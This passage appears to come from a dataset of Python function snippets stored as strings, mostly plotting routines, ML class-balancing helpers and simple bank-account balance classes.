draw_bonus_loss(loss):\n f, ax = plt.subplots()\n vertices = np.arange(10, 50)\n ax.plot(vertices, loss[10:], 'b', label='Loss')\n plt.xlabel('Rounds')\n plt.ylabel('Hinge Loss')\n plt.title('Hinge Loss: l = 10, m = 20, n = 40')\n plt.legend(loc='upper left')\n plt.grid(True)\n plt.show()", "def show_balances(self):\n print 'Pot: %d' % (self.account.balance,)\n for player in self.players:\n balance = player.account.balance\n if balance > 0:\n print '%s: %d' % (player, balance,)", "def produce_cgchart(ytrue, ypred):\n\n yprobas = np.append((1-ypred).reshape(-1,1), ypred.reshape(-1,1), axis=1)\n # 0's and 1's\n print(yprobas.shape)\n areas = plot_cumulative_gain(ytrue, yprobas)", "def compute_random_baseline(self, classes):\n\n # based on the class distribution of the data\n sum_benefit = 0\n\n # c is the actual label\n # if the label in y is unseen when training, skip it, don't include it in the error\n for i, c in enumerate(self.y_chunk):\n for j, cprime in enumerate(classes):\n\n # (1) compute the benefit matrix\n benefit_c_cprime = 0\n if cprime == self.fraud_label:\n benefit_c_cprime = self.X_chunk[i][-1] - self.cost if c == self.fraud_label else -self.cost\n\n # (2) get the probability\n probab_ic = 1 / len(classes)\n sum_benefit += probab_ic * benefit_c_cprime\n\n return sum_benefit", "def plot_results(self):\n [m, s] = self.run_model()\n barM = m.x[2:8]\n barS = s.x[2:8]\n T1vec = self.T1_extraction(self.subj)\n for i in 
T1vec:\n T1vec[T1vec == i] = int(i)\n T1vec = T1vec[2:8]\n barWidth = 25\n r2 = [x + barWidth for x in T1vec]\n plt.grid(b=True, linewidth=0.2)\n plt.bar(\n T1vec, barM, color=\"b\", width=barWidth, edgecolor=\"white\", label=\"Motor\"\n )\n plt.bar(r2, barS, color=\"r\", width=barWidth, edgecolor=\"white\", label=\"Sensory\")\n plt.xlabel(\"T1\", fontweight=\"bold\")\n plt.ylabel(\"Partial contribution\", fontweight=\"bold\")\n plt.legend()\n plt.title(\n \"Partial contribution of cortical layers to motor and sensory operations\"\n )\n plt.show()\n return barM, barS, T1vec", "def transaction_plot(ds):\n import seaborn as sns\n import pandas as pd\n df = pd.DataFrame()", "def _plot(self, step, rewards, losses):\n plt.figure(figsize=(20, 5))\n plt.subplot(131)\n plt.title('Total Episode Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('MSE Loss')\n plt.plot(losses)\n plt.show()", "def distance_plot(self, classified_lines):\n for regions, labels in classified_lines:\n for region, label in zip(regions, labels):\n start = self.attacker_position(region[0])\n end = self.attacker_position(region[1])\n plt.plot([start[0], end[0]], [start[1], end[1]],\n color=self.color(int(label)))", "def plot(self, weight_average=False):\n if(len(self.X)==0 or len(self.T)==0):\n print(\"Nothing to plot...\")\n x = np.array(self.X)\n for i in range(0,x.shape[1]):\n plt.plot(self.T,x[:,i,0])\n if(weight_average):\n w_i = np.zeros(self.size)\n s = sum(np.array(self.graph.degree)[:,1])\n x = self.x_init\n for i in nx.nodes(self.graph):\n w_i[i] = self.graph.degree(i)/s\n x[i] = x[i]*w_i[i]\n plt.plot(np.linspace(0,self.T[-1],10),np.zeros(10)+sum(x), label=\"Connected graph consensus: \"+str(sum(x)),color='red',marker='s')\n else:\n plt.plot(np.linspace(0,self.T[-1],10),np.zeros(10)+np.mean(self.x_init), label=\"Connected graph consensus: \"+str(round(np.mean(self.x_init),3)),color='red',marker='s')\n plt.grid()\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"State\")\n plt.title(\"Convergence of consensus algorithm\")\n plt.legend()", "def activityPlot(act):\n # Plot 1 is simple stacked bar\n plt.figure(figsize=(9,4), dpi=100)\n ax1 = plt.subplot(1,2,1)\n labels = [gr for gr in act.keys()]\n poses = [i+.5 for i in range(len(labels))]\n # b_means, b_stds, t_means, t_stds, s_means, s_stds = [], [], [], [], [], []\n stat = {'b_means': [], 'b_stds': [], 't_means': [], 't_stds': [],'s_means': [], 's_stds': []}\n grkey = {'b_means': 'burst', 'b_stds': 'burst', 't_means': 'tonic', 't_stds': 'tonic','s_means': 'silent', 's_stds': 'silent'}\n fnkey = {'b_means': np.mean, 'b_stds': np.std, 't_means': np.mean, 't_stds': np.std,'s_means': np.mean, 's_stds': np.std}\n \n \n for gr in labels:\n for k in stat.keys():\n try:\n temp_ = fnkey[k](act[gr][grkey[k]])\n if str(temp_) == 'nan':\n stat[k].append(0.)\n else:\n stat[k].append(temp_)\n except:\n stat[k].append(0.)\n \n p_b = ax1.bar(poses, stat['b_means'], color='blue', alpha=0.6, \n yerr=stat['b_stds'], edgecolor='white')\n p_t = ax1.bar(poses, stat['t_means'], bottom=stat['b_means'], color='red', alpha=0.6, \n yerr=stat['t_stds'], edgecolor='white')\n p_s = ax1.bar(poses, stat['s_means'], bottom=[stat['b_means'][i]+\\\n stat['t_means'][i] for i in range(len(stat['b_means']))],\n color='purple', alpha=0.6, yerr=stat['s_stds'],\n edgecolor='white')\n # Cosmetics\n plt.xticks(poses, labels, rotation=30)\n plt.legend((p_b[0], p_t[0], p_s[0]), ('Burst', 'Tonic', 'Silent'))\n \n # Plot 2 is complex\n # ax2 = plt.subplot2grid((1,3), (0,1), colspan=2)\n ax2 = 
plt.subplot(1,2,2)\n for gr in range(len(labels)):\n ax2.plot(np.random.normal(loc=poses[gr], scale=.1, size=len(act[labels[gr]]['burstLoc'])), \n act[labels[gr]]['burstLoc'], 'o', color='blue', alpha=0.6,\n markeredgecolor='none')\n ax2.plot(np.random.normal(loc=poses[gr], scale=.1, size=len(act[labels[gr]]['tonicLoc'])), \n act[labels[gr]]['tonicLoc'], 'o', color='red', alpha=0.6,\n markeredgecolor='none')\n \n # Cosmetics\n plt.xticks(poses, labels, rotation=30)\n print(stat)\n plt.show()\n return", "def plot_misclass(train, test):\n plt.figure(figsize=(12, 10))\n ptrain, = plt.plot(train, label='Train Misclassification')\n ptest, = plt.plot(test, label='Test Misclassification')\n plt.legend(handles=[ptrain, ptest], fontsize=14)\n plt.title('Training vs Test Misclassification', fontsize=16)\n plt.ylabel('Misclassification', fontsize=14)\n plt.xlabel('Iteration', fontsize=14)\n plt.show()", "def draw_num_classes_graphs():\n values = [10, 50, 100, 250, 1000, 4000]\n for num_classes in values:\n print(\"Training model on {} most common classes.\".format(num_classes))\n model = create_pretrained_model(num_classes=num_classes)\n histories = train(model, num_classes, epochs=50)\n run_name = get_run_name(\"{}classes\".format(num_classes))\n save_learning_curves(histories, run_name)\n csv_path = os.path.join(\"plots/\", run_name, \"data.csv\")\n ut.write_csv_dict(histories,\n keys=['loss', 'acc', 'val_loss', 'val_acc'],\n filename=csv_path)", "def returnBalances(self):\n pass", "def plot_probability_distribution(\n y_true, y_pred_proba, threshold, class_labels=[0, 1]):\n\n _y = pd.concat([y_true, y_pred_proba], axis=1)\n\n sns.kdeplot(\n _y[_y.iloc[:, 0] == 1].iloc[:, 1],\n shade=True, label=class_labels[1], linewidth=3, alpha=0.7)\n sns.kdeplot(\n _y[_y.iloc[:, 0] == 0].iloc[:, 1],\n shade=True, label=class_labels[0], linewidth=3, alpha=0.7)\n\n plt.plot( # threshold line\n [threshold, threshold],\n [plt.ylim()[0], plt.ylim()[1]],\n 'r--', linewidth=3,\n alpha=0.3, label='threshold={}'.format(threshold))\n\n plt.xlim(0, 1)\n plt.title(\"Class probability distribution\")\n plt.xlabel('Probability')\n plt.ylabel('Density')\n plt.legend(loc='upper center')\n score = accuracy_score(y_true, y_pred_proba, threshold)\n plt.text(\n 0.05, 0.2,\n \"Score={:.3f}\".format(score),\n bbox=dict(boxstyle=\"round\", fc=\"w\", ec=\"0.5\", alpha=0.9))", "def balance_classes(self, classids):\n \n # Get ROI class counts for each sample patch:\n samples = self.SampleID\n counts = self.count_classes(samples)\n counts = counts[:, classids]\n totalcount = np.sum(counts, axis=0)\n \n # Find the class with minimum and maximum total count:\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n \n # Class balancing is performed as long as the min-max class ratio is \n # not within 50%.\n #\n # Balancing Algorithm:\n # * Randomly sample from samples with non-zero min-class ROI counts \n # and zero maximum class ROIs.\n # * Simulaneously, randomly sample a subset of max-class only samples \n # to be removed from the dataset. 
This levels the field from both \n # directions.\n class_ratio = totalcount[c_min] / totalcount[c_max]\n while (class_ratio < 0.5) & (len(samples) < 3*5000):\n # Find samples with maximum min-max class ratio:\n N = np.sum((counts[:,c_min] > 0) & (counts[:,c_max] == 0))\n M = int(0.5*N)\n \n # Min-class samples to add:\n min_sample = np.nonzero((counts[:,c_min]>0) & (counts[:,c_max]==0))\n min_sample = min_sample[0] # Unfold tuple\n min_sample = min_sample[np.random.randint(0, len(min_sample)-1, N)]\n \n # Max-class samples to remove:\n max_sample = np.nonzero((counts[:,c_min]==0) & (counts[:,c_max]>0))\n max_sample = max_sample[0] # Unfold tuple\n max_sample = max_sample[np.random.randint(0, len(max_sample)-1, M)]\n max_sample = np.unique(max_sample)\n \n # Construct new sample set:\n min_sample = samples[min_sample]\n samples = np.append(np.delete(samples, max_sample), min_sample)\n \n # Recompute total count and min-max class ratio:\n counts = self.count_classes(samples)[:, classids]\n totalcount = np.sum(counts, axis=0)\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n class_ratio = totalcount[c_min] / totalcount[c_max]\n \n # Done, balanced, update samples:\n balancedset = self.Samples[samples,:]\n self._set_sampling_scheme_(balancedset)", "def test_pandas_occupancy_balance(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_pandas()\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def plot_decision_regions(self, option, canvas):\n\t\tle = preprocessing.LabelEncoder()\t\t# integer encoder\n\t\tle.fit(self.y)\n\t\tclassifier = self.classifier.fit(self.X, le.transform(self.y))\n\t\tclasses = classifier.classes_\n\t\tnum_classes = len(classes)\n\n\t\tif option == 'train':\n\t\t\tX = self.X\n\t\t\ty = self.y\n\t\telif option == 'test':\n\t\t\tX = self.test_X\n\t\t\ty = self.test_y\n\n\t\tb1 = self.X.iloc[:, 0]\n\t\tb2 = self.X.iloc[:, 1]\n\t\tb1_slack = (b1.max() - b1.min()) * 0.1\n\t\tb2_slack = (b2.max() - b2.min()) * 0.1\n\t\tb1_min, b1_max = b1.min() - b1_slack, b1.max() + b1_slack \t# x-axis range\n\t\tb2_min, b2_max = b2.min() - b2_slack, b2.max() + b2_slack\t# y-axis range\n\t\tstep_1 = (b1_max - b1_min) / 200\n\t\tstep_2 = (b2_max - b2_min) / 200\n\t\tmd1, md2 = np.meshgrid(np.arange(b1_min, b1_max, step_1), np.arange(b2_min, b2_max, step_2))\n\n\t\trcParams.update({'font.size': 7})\n\t\tcanvas.figure.clear()\n\t\tax = canvas.figure.subplots()\n\t\tlevels = np.arange(-0.19, 1, 0.2) + 0.2\n\n\t\tif num_classes == 2:\n\t\t\tcm_bkgd = plt.cm.RdBu\n\t\t\tcm_pts = ListedColormap(['#FF0000', '#0000FF'])\n\t\t\tZ = classifier.predict_proba(np.c_[md1.ravel(), md2.ravel()])[:, 1]\n\t\t\tZ = Z.reshape(md1.shape)\n\t\t\tax.contourf(md1, md2, Z, vmin=0, vmax=1, cmap=cm_bkgd, alpha=0.8)\n\n\t\telif num_classes == 3:\n\t\t\tcm_bkgd_1 = plt.cm.Reds\n\t\t\tcm_bkgd_2 = plt.cm.Greens\n\t\t\tcm_bkgd_3 = plt.cm.Blues\n\t\t\tcm_pts = cm_pts = ListedColormap(['#FF0000', '#00FF00', '#0000FF'])\n\t\t\tZ = classifier.predict_proba(np.c_[md1.ravel(), md2.ravel()])\n\t\t\tZ1 = Z[:, 0]\n\t\t\tZ2 = Z[:, 1]\n\t\t\tZ3 = Z[:, 2]\n\n\t\t\tP1 = np.maximum(0, Z1 - np.maximum(Z2, Z3))\n\t\t\tP2 = np.maximum(0, Z2 - np.maximum(Z1, Z3))\n\t\t\tP3 = np.maximum(0, Z3 - np.maximum(Z1, Z2))\n\t\t\tP1 = P1.reshape(md1.shape)\n\t\t\tP2 = P2.reshape(md1.shape)\n\t\t\tP3 = P3.reshape(md1.shape)\n\n\t\t\tax.contourf(md1, md2, P1, levels, cmap=cm_bkgd_1, alpha=0.8)\n\t\t\tax.contourf(md1, md2, P2, levels, 
cmap=cm_bkgd_2, alpha=0.8)\n\t\t\tax.contourf(md1, md2, P3, levels, cmap=cm_bkgd_3, alpha=0.8)\n\n\t\td1 = X.iloc[:, 0] \t# x-axis\n\t\td2 = X.iloc[:, 1]\t# y-axis\n\t\tax.scatter(d1, d2, c=le.transform(y), cmap=cm_pts, alpha=0.6, edgecolors='k')\n\t\tax.set_xlim(md1.min(), md1.max())\n\t\tax.set_ylim(md2.min(), md2.max())\n\t\tax.set_xticks(())\n\t\tax.set_yticks(())\n\t\tax.set_xlabel(X.columns[0])\n\t\tax.set_ylabel(X.columns[1])\n\n\t\tcanvas.figure.tight_layout()\n\t\tcanvas.draw()", "def graph(self):\n seq_obj = MultiSequence(self.symbol, self.__best_model.window_size,1)\n test_predict = self.__best_model.model.predict(seq_obj.X)\n\n #our data is scaled between -1 and 1 so lets scale it back up\n scaler = MinMaxScaler(feature_range=(self.__min_price ,self.__max_price))\n orig_data = seq_obj.original_data.reshape(-1,1)\n orig_prices = scaler.fit_transform(orig_data).flatten()\n \n # plot actual prices\n plt.plot(orig_prices, color='k')\n \n # plot test set prediction after scaling back up\n length = len(seq_obj.X) + self.__best_model.window_size \n test_in = np.arange(self.__best_model.window_size,length,1)\n pred_prices = scaler.fit_transform(test_predict.reshape(-1,1)).flatten()\n plt.plot(test_in,pred_prices,color = 'b')\n \n # pretty up graph\n plt.xlabel('day')\n plt.ylabel('Closing price of stock')\n plt.title(\"Price prediction for {}\".format(self.symbol))\n plt.legend(['Actual','Prediction'],loc='center left', bbox_to_anchor=(1, 0.5))\n plt.show()", "def plot(self):\n h = .02\n i=1\n bags_X = self.bags_X\n bags_y = self.bags_y\n fig1 = plt.figure(figsize=(45, 9))\n\n \n cm = plt.cm.RdBu\n cm_bright = ListedColormap(['#FF0000', '#0000FF'])\n \n for model in self.models:\n ax = plt.subplot(1, len(self.models) , i)\n X = pd.DataFrame(bags_X[i-1])\n y = pd.Series(bags_y[i-1])\n x_min, x_max = X[X.columns[0]].min() - .5, X[X.columns[0]].max() + .5\n y_min, y_max = X[X.columns[1]].min() - .5, X[X.columns[1]].max() + .5\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n Z = np.array(model.predict(pd.DataFrame(np.c_[xx.ravel(), yy.ravel()], columns=X.columns)))\n # print(Z[12])\n Z = Z.reshape(xx.shape)\n ax.contourf(xx, yy, Z, cmap=cm, alpha=.8)\n ax.scatter(X[X.columns[0]], X[X.columns[1]], c=y, cmap=cm_bright, edgecolors='k')\n # size=[1000*w for w in self.weights[i-1]]\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xlabel(str(X.columns[0]))\n ax.set_ylabel(str(X.columns[1]))\n plt.title(\"Estimator \"+str(i))\n i+=1\n \n fig2 = plt.figure(figsize=(9,9))\n X = self.X\n y = self.y\n ax2 = plt.subplot(1,1,1)\n x_min, x_max = X[X.columns[0]].min() - .5, X[X.columns[0]].max() + .5\n y_min, y_max = X[X.columns[1]].min() - .5, X[X.columns[1]].max() + .5\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n Z = np.array(self.predict(pd.DataFrame(np.c_[xx.ravel(), yy.ravel()], columns=X.columns)))\n Z = Z.reshape(xx.shape)\n ax2.contourf(xx, yy, Z, cmap=cm, alpha=.8)\n # size=[1000*w for w in self.weights[i-2]]\n ax2.scatter(X[X.columns[0]], X[X.columns[1]], c=y, cmap=cm_bright, edgecolors='k')\n ax2.set_xlim(xx.min(), xx.max())\n ax2.set_ylim(yy.min(), yy.max())\n plt.title(\"Combined Decision Surface\")\n \n plt.tight_layout()\n plt.show()\n\n return [fig1,fig2]", "def main(self, img, roi):\n\n self.img = img\n self.roi = roi\n transimg1, odimg1 = imageprocess.calc_absimage(np.dstack([img[:, :, 1],\n img[:, :, 5],\n img[:, :, 3]]),\n norm_edge=True)\n transimg2, odimg2 = 
imageprocess.calc_absimage(np.dstack([img[:, :, 2],\n img[:, :, 6],\n img[:, :, 4]]),\n norm_edge=True)\n odimg1 = imageprocess.normalize_edgestrip(odimg1)\n odimg2 = imageprocess.normalize_edgestrip(odimg2)\n balance = odimg1[roi].mean() / odimg2[roi].mean()\n\n self.ax1.imshow(transimg1, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.ax2.imshow(transimg2, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.balance_label.setText('The balance is %s'%balance)", "def plot_cost(self):\n steps = np.arange(len(self.cost_values))\n plt.plot(steps, self.cost_values, '-o')\n plt.xlabel(\"Steps\")\n plt.ylabel(\"Cost value\")\n plt.title(\"Cost value per step using Gradient Descent\")\n plt.show()", "def getClassBalance(pshapes, bounds, proj):\n\n xmin, ymin, xmax, ymax = bounds\n bpoly = Polygon([(xmin, ymax),\n (xmax, ymax),\n (xmax, ymin),\n (xmin, ymin)])\n project = partial(\n pyproj.transform,\n pyproj.Proj(proj='latlong', datum='WGS84'),\n proj)\n bpolyproj = transform(project, bpoly)\n totalarea = bpolyproj.area\n polyarea = 0\n for pshape in pshapes:\n polyarea += pshape.area\n\n return polyarea/totalarea", "def plot_star_classes(obj_catalog):\n\n fig = plt.figure(num=None,figsize=(8,8), dpi=100)\n ax = fig.add_subplot(1,1,1)\n\n phot_class = obj_catalog.phot_star_class\n sclass = obj_catalog.star_class\n phot_class_num = np.zeros(obj_catalog.shape[0])\n sclass_num = np.zeros(obj_catalog.shape[0])\n\n star_classes = ['WD',\\\n 'O','O8','O9','OB','B0','B1','B2','B3','B5','B6','B7','B8','B9',\\\n 'A0','A1','A2','A3','A4','A5','A6','A8','A9',\\\n 'F0','F2','F3','F5','F6','F8','F9',\\\n 'G0','G1','G2','G3','G4','G5','G8','G9',\\\n 'K0','K1','K2','K3','K4','K5','K7',\\\n 'M0','M1','M2','M3','M4','M5','M6','M7','M8','M9', \\\n 'L0','L1','L2','L3','L4','L5','L9','Ldwarf', \\\n 'T','other','C']\n print len(star_classes)\n\n star_dict = dict(zip(star_classes,np.arange(len(star_classes))))\n\n # print phot_class.value_counts()\n\n for i in range(len(phot_class)):\n print phot_class[i], star_dict[phot_class[i]], sclass[i],star_dict[sclass[i]]\n phot_class_num[i] = star_dict[phot_class[i]]\n sclass_num[i] = star_dict[sclass[i]]\n\n #ax.plot(sclass_num,phot_class_num,'.')\n\n cmap = plt.cm.Blues\n cmap.set_bad('0.85',1.0)\n\n cax = plt.hist2d(sclass_num,phot_class_num, bins=65,range = [[0,65], [0,65]], norm = LogNorm(), cmap=cmap, zorder=0)\n cbar = plt.colorbar(ticks=[1,5,10,15,20,25,30,40])\n cbar.ax.set_yticklabels([1,5,10,15,20,25,30,40],fontsize=12)\n\n ax.plot(np.arange(65),np.arange(65),'r')\n\n plt.xticks(np.arange(len(star_classes)),star_classes,fontsize=8,rotation='vertical')\n plt.yticks(np.arange(len(star_classes)),star_classes,fontsize=8)\n\n plt.grid(True)\n return plt", "def generation(self,rounds):\n a = []\n b = []\n for i in range(rounds):\n self.fight()\n c = self.avgFitness()\n a.append(c[0])\n b.append(c[1])\n self.sort()\n self.cull()\n self.rePop()\n self.refresh()\n self.fight()\n self.sort()\n print self\n plt.scatter([x for x in range(len(a))],a,color = \"red\")\n plt.scatter([x for x in range(len(b))],b,color = \"green\")\n plt.show()", "def generation(self,rounds):\n a = []\n b = []\n for i in range(rounds):\n self.fight()\n c = self.avgFitness()\n a.append(c[0])\n b.append(c[1])\n self.sort()\n self.cull()\n self.rePop()\n self.refresh()\n self.fight()\n self.sort()\n print self\n plt.scatter([x for x in range(len(a))],a,color = \"red\")\n plt.scatter([x for x in range(len(b))],b,color = \"green\")\n plt.show()", "def draw_discount_curve(self):\n 
data=Bootstrapping.get_ytm_discount_data(self)\n fig = plt.figure(figsize=[10, 6])\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(data['discount_rate'])\n ax.set_xlabel('Term')\n ax.set_ylabel('value')\n ax.set_title('Discount Curves')\n plt.show()", "def __init__(self, initial_balance):\n self.balance = initial_balance\n self.fees = 0", "def graph_results(loss, acc):\n N = len(loss)\n x = np.linspace(0, N, N)\n plt.subplot(1,2,1)\n plt.plot(x, loss)\n plt.subplot(1,2,2)\n plt.plot(x,acc)\n plt.show()", "def __init__(self,owner,balance):\r\n self.owner = owner\r\n self.balance = balance\r\n #print(f\"Account owner: {self.owner} \\nAccount Balance: {self.balance}\")\r\n print(\"{}'s balance is {}\".format(self.owner,self.balance))", "def visualize(self, time, pred, true):\n plt.plot(time, true, label='Actual')\n plt.plot(time, pred, label='Predicted')\n plt.xlabel('Time')\n plt.ylabel('Price ($)')\n plt.legend(bbox_to_anchor=(0.1, 1), loc=2, borderaxespad=0.,\n prop={'size': 14})\n plt.show()", "def printBalance(self):\n\n print(\"\\nBalance - {self.name}\".format(self=self))\n print(\"Account balance: £{self.balance:.2f}\".format(self=self))\n \n # if overdraft is available, also prints overdraft details\n if self.overdraft == True:\n availableBalance = self.getAvailableBalance()\n print(\"Remaining overdraft: £{0:.2f}\\nOverdraft limit: £{1:.2f}\".format(availableBalance, self.overdraftLimit))", "def count_plot_target_class(self):\r\n print(self.dataframe_name)\r\n print(self.data_frame.groupby([self.target_column]).size()) # print the sum of every class\r\n\r\n sns.countplot(data=self.data_frame, x=self.data_frame[self.target_column])\r\n plt.title(self.dataframe_name + ': Display the distribution of ' + self.target_column + ' class')\r\n plt.xlabel('Target Name: ' + self.target_column)\r\n plt.ylabel('Count')\r\n self.save_plot_as_image()\r\n plt.show()", "def plot_student_adj(df, with_self=True):\n fig, axes = plt.subplots(3, sharex=True)\n df = df.sort_values('Final Adj Factor')\n df.plot(x='Student Name', y='Mean Adj Factor', kind='bar',\n yerr='STD Adj Factor', ylim=(0.6, 1.1), ax=axes[0])\n df.plot(x='Student Name', y='Improvement', kind='bar', ax=axes[1])\n df.plot(x='Student Name', y='Final Adj Factor', kind='bar',\n ylim=(0.70, 1.1), ax=axes[2])\n return axes", "def _subdiff_b(self, i, compensate_class_balance=False):\n if 1 - self._data.train_y[i] * self._f(self._data.train_X[:, i]) > 0:\n if compensate_class_balance:\n return - self._data.train_y[i] * self._data.importance(self._data.train_y[i])\n else:\n return - self._data.train_y[i]\n else:\n return 0", "def plot_diff(self):\n if not(self.is_attribute(\"time\") & self.is_attribute(\"intensity_up\") & \n self.is_attribute(\"intensity_up_sigma\") &\n self.is_attribute(\"intensity_down\") & \n self.is_attribute(\"intensity_down_sigma\") &\n self.is_attribute(\"intensity_up_total\") &\n self.is_attribute(\"intensity_down_total\")):\n return\n fig, ax = plt.subplots()\n ax.set_title(\"Polarized intensity: I_up - I_down\")\n ax.set_xlabel(\"Time (microseconds)\")\n ax.set_ylabel('Intensity')\n \n np_time = numpy.array(self.time, dtype=float)\n np_up = numpy.array(self.intensity_up, dtype=float)\n np_sup = numpy.array(self.intensity_up_sigma, dtype=float)\n np_up_mod = numpy.array(self.intensity_up_total, dtype=float)\n np_down = numpy.array(self.intensity_down, dtype=float)\n np_sdown = numpy.array(self.intensity_down_sigma, dtype=float)\n np_down_mod = numpy.array(self.intensity_down_total, dtype=float)\n np_diff = np_up - np_down\n 
np_diff_mod = np_up_mod - np_down_mod\n np_sdiff = numpy.sqrt(numpy.square(np_sup)+numpy.square(np_sdown))\n\n ax.plot([np_time.min(), np_time.max()], [0., 0.], \"b:\")\n ax.plot(np_time, np_diff_mod, \"k-\",\n label=\"model\")\n ax.errorbar(np_time, np_diff, yerr=np_sdiff, fmt=\"ko\", alpha=0.2,\n label=\"experiment\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_diff-np_diff_mod).max()\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, np_diff-np_diff_mod+param, \"r-\", alpha=0.7,\n label=\"difference\")\n ax.legend(loc='upper right')\n fig.tight_layout()\n return (fig, ax)", "def __balance_data(self):\n # Shuffle each class independently (This is useful in case of multiple root directories because it does not\n # discard only elements of the last listed root directory, but random elements of all root directories)\n start_index = 0\n for class_id, num_samples_in_this_class in enumerate(self.__samples_per_class):\n permutation = np.random.permutation(num_samples_in_this_class)\n self.__image_file_names[start_index:start_index + num_samples_in_this_class] = \\\n self.__image_file_names[start_index:start_index + num_samples_in_this_class][permutation]\n start_index += num_samples_in_this_class\n\n class_with_min_samples = np.argmin(self.__samples_per_class)\n num_min_samples = self.__samples_per_class[class_with_min_samples]\n\n # Remove all elements in the majority classes in order to balance their sample numbers to the minority class.\n start_index = 0\n elements_to_delete = []\n for num_samples_in_this_class in self.__samples_per_class:\n new_indices_to_delete = [i for i in\n range(start_index + num_min_samples, start_index + num_samples_in_this_class)]\n elements_to_delete.extend(new_indices_to_delete)\n start_index += num_samples_in_this_class\n\n self.__labels = np.delete(self.__labels, elements_to_delete)\n self.__image_file_names = np.delete(self.__image_file_names, elements_to_delete)\n\n # Check for class balance.\n cumulator = np.zeros(shape=3)\n for label in self.__labels:\n cumulator[label] += 1\n for i in range(2):\n if cumulator[i] != cumulator[i + 1]:\n raise RuntimeError(\"Error in data balancing: resulting label distribution: {}\".format(cumulator))\n\n self.__samples_per_class = [num_min_samples for _ in range(self.num_classes)]", "def plot_comparisons(self, exact, blocked, blockederr, axdelta=None):\n if axdelta is None:\n axdelta = plt.gca()\n delta = self.means - exact\n axdelta.errorbar(list(range(1, self.max_dets)), delta[0], yerr=self.stderr[0], label='independent')\n axdelta.errorbar(list(range(1, self.max_dets)), delta[1], yerr=self.stderr[1], label='correlated')\n axdelta.axhline(delta[0, 0], linestyle=':', color='grey', label='reference')\n axdelta.axhline(0, linestyle='-', linewidth=1, color='black')\n if blocked:\n axdelta.axhline(blocked-exact, linestyle='--', color='darkgreen', label='reblocked')\n if blockederr:\n axdelta.fill_between([0, self.max_dets], [blocked-exact-blockederr,blocked-exact-blockederr],\n [blocked-exact+blockederr,blocked-exact+blockederr], color='green', alpha=0.2)\n axdelta.set_xlabel('Number of determinants in estimator')\n axdelta.set_ylabel(r'$E-E_\\mathrm{CCSD}$ / ha')\n axdelta.legend()\n return axdelta", "def visualize(X: pd.DataFrame, y: pd.DataFrame) -> None:\r\n y[\"Action\"].value_counts().plot.pie(explode=(0.02, 0.04, 0.05, 0.09), title=\"Proportion of classes in dataset\")\r\n plt.savefig(\"Figures/proportions\")\r\n\r\n for i, column in enumerate(X.columns):\r\n fig, ax = 
plt.subplots(1, 2)\r\n\r\n ax[0].hist(\r\n (\r\n X[y[\"Action\"] == \"allow\"][column],\r\n X[y[\"Action\"] == \"deny\"][column],\r\n X[y[\"Action\"] == \"drop\"][column],\r\n X[y[\"Action\"] == \"reset-both\"][column],\r\n )\r\n )\r\n ax[0].set_xlabel(column)\r\n ax[0].set_ylabel(\"Frequency\")\r\n\r\n ax[1].boxplot(\r\n (\r\n X[y[\"Action\"] == \"allow\"][column],\r\n X[y[\"Action\"] == \"deny\"][column],\r\n X[y[\"Action\"] == \"drop\"][column],\r\n X[y[\"Action\"] == \"reset-both\"][column],\r\n )\r\n )\r\n ax[1].set_xlabel(\"Action\")\r\n ax[1].set_ylabel(column)\r\n\r\n X[column].hist(by=y[\"Action\"])\r\n\r\n ax[0].legend([\"allow\", \"deny\", \"drop\", \"reset-both\"])\r\n ax[1].set_xticklabels([\"allow\", \"deny\", \"drop\", \"reset-both\"])\r\n fig.suptitle(\"Distribution of classes among attributes\")\r\n plt.savefig(\"Figures/boxplots\")", "def test_class():\n riskfree = .03\n maturity = 30/365\n moneyness = np.linspace(-.04, .04, 10)\n premium = np.ones_like(moneyness) * .05\n call = True\n data = {'riskfree': riskfree, 'maturity': maturity,\n 'moneyness': moneyness, 'call': call, 'premium': premium}\n\n sigma = .13\n bsm = BSmodel(sigma, data)\n\n weights = [.63]\n means = [-.01, .09]\n stds = [.16, .05]\n param = weights + means + stds\n mbs = MBSmodel(param, data)\n\n param_a, param_p, param_c = 4, 1.5, -.05\n gb2 = GB2model([param_a, param_p, param_c], data)\n print(gb2.get_pnames())\n\n plt.figure()\n for model in [bsm, mbs, gb2]:\n plt.plot(moneyness, model.density(moneyness), label=model.get_name())\n plt.legend()\n plt.show()\n\n plt.figure()\n for model in [bsm, mbs, gb2]:\n plt.plot(moneyness, model.premium(), label=model.get_name())\n plt.legend()\n plt.show()\n\n plt.figure()\n for model in [bsm, mbs, gb2]:\n plt.plot(moneyness, model.impvol(), label=model.get_name())\n plt.legend()\n plt.show()\n\n print('BS objective function = %.4f' % bsm.objective(sigma))\n print('GB2 objective function = %.4f'\n % gb2.objective([param_a, param_p, param_c]))", "def plot_betweeness(net, label, outpath):\n _, betweeness_values = networkit_util.get_betweeness(net, label, outpath)\n unique_value, unique_cnt = np.unique(betweeness_values, return_counts=True)\n unique_cumcnt = np.cumsum(unique_cnt) / sum(unique_cnt)\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(unique_value, unique_cumcnt, 'b.')\n # ax.set_title('Cumulative distribution of betweeness centrality of nodes')\n ax.set_xlabel('betweeness centrality b')\n ax.set_ylabel('p(x <= b)')\n plt.savefig(outpath + label + \"-betweeness-distribution.eps\")", "def plot(self):\n\t\tself.plotOfHeatingCurrent().plot()", "def plot(self):\n x = np.arange(5)\n # labels = ['temp', 'humi', 'mais', 'o2', 'co2']\n plt.bar(x - 0.35/2, self.data, 0.35, label='actual')\n plt.bar(x + 0.35/2, self.desired_values, 